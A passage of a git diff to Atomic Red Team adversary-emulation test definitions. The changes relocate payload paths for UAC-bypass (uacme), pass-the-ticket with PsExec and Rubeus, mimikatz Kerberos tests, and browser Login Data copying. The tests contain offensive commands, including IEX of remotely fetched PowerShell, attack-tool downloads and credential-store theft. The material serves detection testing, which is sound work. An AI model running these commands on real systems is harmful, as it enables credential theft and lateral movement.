description: | @@ -269,9 +271,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -306,7 +309,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\33 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -315,9 +318,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -352,7 +356,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\34 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -361,9 +365,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -398,7 +403,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\39 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -407,9 +412,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -444,7 +450,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\56 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -453,9 +459,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -490,7 +497,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\59 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -499,9 +506,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -536,7 +544,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\61 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -545,9 +553,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index c8efd933..e61c3f11 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -15,7 +15,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: path - default: PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | @@ -24,6 +24,7 @@ atomic_tests: if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } @@ -57,43 +58,36 @@ atomic_tests: description: domain type: string default: $Env:USERDOMAIN - rubeus_path: - description: Path of the Rubeus binary - type: path - default: $Env:TEMP\rubeus.exe rubeus_url: description: URL of Rubeus executable type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe - psexec_path: - description: Path of the PsExec binary - type: string - default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: - description: | - Rubeus must exist on disk at specified location (#{rubeus_path}) + Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" prereq_command: | - if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1} get_prereq_command: | - Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-Webrequest -Uri #{rubeus_url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" - description: | - PsExec must exist on disk at specified location (#{psexec_path}) + PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" prereq_command: | - if (Test-Path #{psexec_path}) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: name: powershell elevation_required: true command: | - #{psexec_path} -accepteula \\#{target} -w c:\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi - Set-Location $env:TEMP + & "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi + Set-Location PathToAtomicsFolder\..\ExternalPayloads Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local" - & "#{rubeus_path}" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt - Remove-Item $env:TEMP\ticket.kirbi - & "#{rubeus_path}" purge + & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi + & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge \ No newline at end of file diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index d8e5cf04..4fd7dd88 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -6,7 +6,7 @@ atomic_tests: description: | A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. - Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. + Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of PathToAtomicsFolder\..\ExternalPayloads\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) supported_platforms: @@ -15,7 +15,7 @@ atomic_tests: file_path: description: File path for modified Sysinternals type: string - default: $env:TEMP + default: PathToAtomicsFolder\..\ExternalPayloads dependency_executor_name: powershell dependencies: - description: | @@ -90,19 +90,20 @@ atomic_tests: Chrome must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' get_prereq_command: | - $installer = "$env:temp\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" executor: name: powershell command: | - Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp - Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp + Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads + Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination PathToAtomicsFolder\..\ExternalPayloads cleanup_command: | - Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data For Account" -Force -ErrorAction Ignore - name: Simulating access to Opera Login Data auto_generated_guid: 28498c17-57e4-495a-b0be-cc1e36de408b description: | @@ -115,8 +116,9 @@ atomic_tests: Opera must be installed prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}' get_prereq_command: | - $installer = "$env:temp\OperaStandaloneInstaller.exe" - Invoke-WebRequest -OutFile $env:temp\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + $installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0' Start-Sleep -s 180 Stop-Process -Name "opera" @@ -128,9 +130,9 @@ atomic_tests: executor: name: powershell command: | - Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp + Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads cleanup_command: | - Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -144,8 +146,9 @@ atomic_tests: Firefox must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} - $installer = "$env:temp\firefoxsetup.exe" + $installer = "PathToAtomicsFolder\..\ExternalPayloads\firefoxsetup.exe" (New-Object Net.WebClient).DownloadFile($url,$installer) Start-Process $installer -ArgumentList '/S' -Wait - description: | @@ -160,9 +163,9 @@ atomic_tests: executor: name: powershell command: | - Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -Recurse + Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination PathToAtomicsFolder\..\ExternalPayloads -Force -Recurse cleanup_command: | - Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ignore -Recurse + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Profiles" -Force -ErrorAction Ignore -Recurse - name: Simulating access to Windows Edge Login Data auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329 description: | @@ -188,9 +191,9 @@ atomic_tests: executor: name: powershell command: | - Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination $env:temp\Edge -Force -Recurse + Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination PathToAtomicsFolder\..\ExternalPayloads\Edge -Force -Recurse cleanup_command: | - Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore -Recurse + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -ErrorAction Ignore -Recurse - name: Decrypt Mozilla Passwords with Firepwd.py auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381 description: | @@ -202,7 +205,7 @@ atomic_tests: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: $env:temp\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py Out_Filepath: description: Filepath to output results to type: string @@ -228,8 +231,9 @@ atomic_tests: prereq_command: | if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "$env:temp\firefox.msi" - msiexec.exe /i "$env:temp\firefox.msi" /quiet + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" + msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet sleep -s 30 start-process "$env:programfiles\Mozilla Firefox\firefox.exe". sleep -s 5 @@ -239,25 +243,25 @@ atomic_tests: prereq_command: | if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "$env:temp\VS_BuildTools.exe" - write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from $env:temp\VS_BuildTools.exe." + invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe" + write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe." - description: | Python must be installed prereq_command: | if (Test-Path "#{Python_Path}") {exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "$env:temp\python_setup.exe" - Start-Process -FilePath $env:TEMP\python_setup.exe -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | Pip must be installed. prereq_command: | $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) if (pip -v) {exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "$env:temp\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "$env:temp\get-pip.py" - cmd /c "$env:temp\ez_setup.py" - cmd /c "$env:temp\get-pip.py" + invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" + invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - description: | Pycryptodome library must be installed prereq_command: | @@ -426,8 +430,9 @@ atomic_tests: prereq_command: | 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' get_prereq_command: | - $installer = "$env:temp\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" @@ -445,13 +450,13 @@ atomic_tests: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data" executor: command: | - Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "$env:temp" > $null + Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null cd "$env:PathToAtomicsFolder\T1555.003\bin" .\BrowserCollector.exe cleanup_command: | Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Copy-Item "$env:temp" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Remove-Item "$env:temp\Login Data" > $null + Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null + Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null name: powershell diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml index 3740e47f..4df8e5a3 100644 --- a/atomics/T1558.001/T1558.001.yaml +++ b/atomics/T1558.001/T1558.001.yaml @@ -29,7 +29,7 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: - description: | @@ -39,6 +39,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } diff --git a/atomics/T1558.002/T1558.002.yaml b/atomics/T1558.002/T1558.002.yaml index a552f63d..946a80cf 100644 --- a/atomics/T1558.002/T1558.002.yaml +++ b/atomics/T1558.002/T1558.002.yaml @@ -32,7 +32,7 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: - description: | @@ -42,6 +42,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 3b9f1777..54394ff1 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml @@ -37,7 +37,7 @@ atomic_tests: local_folder: description: Local path of Rubeus executable type: path - default: $Env:temp + default: PathToAtomicsFolder\..\ExternalPayloads local_executable: description: name of the rubeus executable type: string @@ -67,6 +67,7 @@ atomic_tests: prereq_command: | if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} executor: command: | diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml index 6d8c2cad..98b6f6e2 100644 --- a/atomics/T1558.004/T1558.004.yaml +++ b/atomics/T1558.004/T1558.004.yaml @@ -12,7 +12,7 @@ atomic_tests: local_folder: description: Local path of Rubeus executable type: path - default: $Env:temp + default: PathToAtomicsFolder\..\ExternalPayloads local_executable: description: name of the rubeus executable type: string @@ -38,6 +38,7 @@ atomic_tests: prereq_command: | if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} executor: command: | diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 624a52d9..1a6a8394 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ 